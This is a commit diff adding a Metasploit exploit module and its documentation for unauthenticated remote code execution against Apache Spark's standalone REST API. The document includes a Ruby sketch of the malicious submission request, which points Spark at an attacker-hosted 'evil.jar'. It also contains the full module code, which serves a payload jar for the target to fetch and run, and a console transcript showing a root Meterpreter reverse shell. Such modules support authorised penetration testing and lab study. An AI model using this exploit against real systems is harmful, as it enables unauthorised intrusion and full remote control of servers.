Land #10954, apache spark unauth rce module
parent 94abef4aa1
commit e88d2a1fcd

@@ -0,0 +1,70 @@
## Description

This module exploits an unauthenticated command execution vulnerability in Apache Spark standalone cluster mode via its REST API. It uses the `CreateSubmissionRequest` action to submit a malicious Java class and trigger its execution.
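The submission itself is a single JSON POST to the REST endpoint `/v1/submissions/create`. The sketch below mirrors the hash the module builds in `send_payload`; the target address, jar URL, application name, and `mainClass` package are illustrative placeholders (the module randomizes the package and app name at runtime).

```
# Rough shape of the CreateSubmissionRequest the module sends. Values marked
# as placeholders are generated dynamically by the module.
require 'net/http'
require 'json'

target  = URI('http://127.0.0.1:6066/v1/submissions/create')  # placeholder target
jar_url = 'http://10.139.14.167:9999/evil.jar'                 # placeholder payload URL

body = {
  'action'               => 'CreateSubmissionRequest',
  'clientSparkVersion'   => '2.3.1',                  # taken from the target's serverSparkVersion
  'appArgs'              => [],
  'appResource'          => jar_url,                  # Spark fetches the jar from here
  'environmentVariables' => { 'SPARK_ENV_LOADED' => '1' },
  'mainClass'            => 'metasploit.Payload',     # placeholder; package name is randomized
  'sparkProperties'      => {
    'spark.jars'              => jar_url,
    'spark.driver.supervise'  => 'false',
    'spark.app.name'          => 'someapp',           # placeholder; randomized by the module
    'spark.eventLog.enabled'  => 'true',
    'spark.submit.deployMode' => 'cluster',
    'spark.master'            => 'spark://127.0.0.1:6066'
  }
}

res = Net::HTTP.post(target, body.to_json, 'Content-Type' => 'application/json;charset=UTF-8')
puts res.body
```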
## Vulnerable Application

https://github.com/vulhub/vulhub/tree/master/spark/unacc

`docker-compose up -d`
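Once the container is up, you can confirm the REST submission API is reachable. An unauthenticated GET against the root returns HTTP 400 together with a JSON error document that includes `serverSparkVersion`, which is the same fingerprint the module's `check` method relies on. A minimal sketch, assuming the default port 6066 exposed by the vulhub setup:

```
# The Spark REST API answers a bare GET with HTTP 400 and a JSON body that
# discloses serverSparkVersion, even to unauthenticated clients.
require 'net/http'
require 'json'

res = Net::HTTP.get_response(URI('http://127.0.0.1:6066/'))
puts res.code                                    # expect "400"
puts JSON.parse(res.body)['serverSparkVersion']  # e.g. "2.3.1"
```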
## Verification Steps

1. Start `msfconsole`
2. `use exploit/linux/http/spark_unauth_rce`
3. `set payload <payload>`
4. `set rhosts <rhosts>`
5. `set rport <rport>`
6. `set srvhost <srvhost>`
7. `set srvport <srvport>`
8. `set lport <lport>`
9. `set lhost <lhost>`
10. `exploit`
## Scenarios

### Spark 2.3.1

```
msf5 > use exploit/linux/http/spark_unauth_rce
msf5 exploit(linux/http/spark_unauth_rce) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(linux/http/spark_unauth_rce) > set rport 6066
rport => 6066
msf5 exploit(linux/http/spark_unauth_rce) > set srvhost 10.139.14.167
srvhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set srvport 9999
srvport => 9999
msf5 exploit(linux/http/spark_unauth_rce) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(linux/http/spark_unauth_rce) > set lhost 10.139.14.167
lhost => 10.139.14.167
msf5 exploit(linux/http/spark_unauth_rce) > set lport 5555
lport => 5555
msf5 exploit(linux/http/spark_unauth_rce) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.139.14.167:5555
msf5 exploit(linux/http/spark_unauth_rce) > [*] Starting up our web service ...
[*] Using URL: http://10.139.14.167:9999/feTYHNiHufrGI
[*] 127.0.0.1:6066 - Sending the payload to the server...
[*] Sending stage (53867 bytes) to 10.139.14.167
[*] Meterpreter session 2 opened (10.139.14.167:5555 -> 10.139.14.167:56021) at 2018-11-12 16:59:33 +0800
msf5 exploit(linux/http/spark_unauth_rce) > sessions

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  2         meterpreter java/linux   root @ 96b2135aee9c  10.139.14.167:5555 -> 10.139.14.167:56021 (127.0.0.1)

msf5 exploit(linux/http/spark_unauth_rce) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: root
meterpreter >
```
@@ -0,0 +1,150 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Spark Unauthenticated Command Execution',
      'Description'    => %q{
        This module exploits an unauthenticated command execution vulnerability
        in Apache Spark standalone cluster mode via its REST API. It uses the
        CreateSubmissionRequest action to submit a malicious Java class and
        trigger its execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'aRe00t',                            # Proof of concept
          'Green-m <greenm.xxoo[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['URL', 'https://www.jianshu.com/p/a080cb323832'],
          ['URL', 'https://github.com/vulhub/vulhub/tree/master/spark/unacc']
        ],
      'Platform'       => 'java',
      'Arch'           => [ARCH_JAVA],
      'Targets'        =>
        [
          ['Automatic', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 12 2017',
      'DefaultTarget'  => 0,
      'Notes'          =>
        {
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Stability'   => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION]
        }
    ))

    register_options [
      Opt::RPORT(6066),
      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
    ]
  end
  def check
    return CheckCode::Detected if get_version
    CheckCode::Unknown
  end

  # Called by HttpServer once the web service is up: build the URL the Spark
  # master will fetch the jar from and submit the malicious driver.
  def primer
    path = service.resources.keys[0]
    binding_ip = srvhost_addr

    proto = datastore['SSL'] ? 'https' : 'http'
    payload_uri = "#{proto}://#{binding_ip}:#{datastore['SRVPORT']}/#{path}"

    send_payload(payload_uri)
  end

  def exploit
    fail_with(Failure::Unknown, "Something went horribly wrong and we couldn't continue to exploit.") unless get_version

    vprint_status('Generating payload ...')
    @pl = generate_payload.encoded_jar(random: true)
    fail_with(Failure::Unknown, 'Failed to generate the payload.') unless @pl

    # Serve the jar just long enough for the Spark master to fetch it, then
    # let the web server time out and shut down.
    print_status('Starting up our web service ...')
    Timeout.timeout(datastore['HTTPDELAY']) { super }
  rescue Timeout::Error
  end
  # Fingerprint the Spark REST API: an unauthenticated GET against the root
  # is answered with HTTP 400 and a JSON error document that discloses
  # serverSparkVersion.
  def get_version
    @version = nil

    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path),
      'method' => 'GET'
    )

    unless res
      vprint_bad("#{peer} - No response.")
      return false
    end

    if res.code == 401
      print_bad("#{peer} - Authentication required.")
      return false
    end

    unless res.code == 400
      return false
    end

    res_json = res.get_json_document
    @version = res_json['serverSparkVersion']

    if @version.nil?
      vprint_bad("#{peer} - Cannot parse the response, it does not look like the Spark REST API.")
      return false
    end

    true
  end
  # Submit a CreateSubmissionRequest that points the Spark master at our web
  # service for the jar (appResource/spark.jars) and names the Metasploit
  # payload class as the driver's mainClass.
  def send_payload(payload_uri)
    rand_appname = Rex::Text.rand_text_alpha_lower(8..16)

    data =
      {
        "action" => "CreateSubmissionRequest",
        "clientSparkVersion" => @version.to_s,
        "appArgs" => [],
        "appResource" => payload_uri.to_s,
        "environmentVariables" => {"SPARK_ENV_LOADED" => "1"},
        "mainClass" => "#{@pl.substitutions["metasploit"]}.Payload",
        "sparkProperties" =>
          {
            "spark.jars" => payload_uri.to_s,
            "spark.driver.supervise" => "false",
            "spark.app.name" => rand_appname.to_s,
            "spark.eventLog.enabled" => "true",
            "spark.submit.deployMode" => "cluster",
            "spark.master" => "spark://#{rhost}:#{rport}"
          }
      }

    send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, "/v1/submissions/create"),
      'method' => 'POST',
      'ctype'  => 'application/json;charset=UTF-8',
      'data'   => data.to_json
    )
  end

  # Handle incoming requests: serve the generated jar to the Spark master.
  def on_request_uri(cli, request)
    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
    send_response(cli, @pl)
  end
end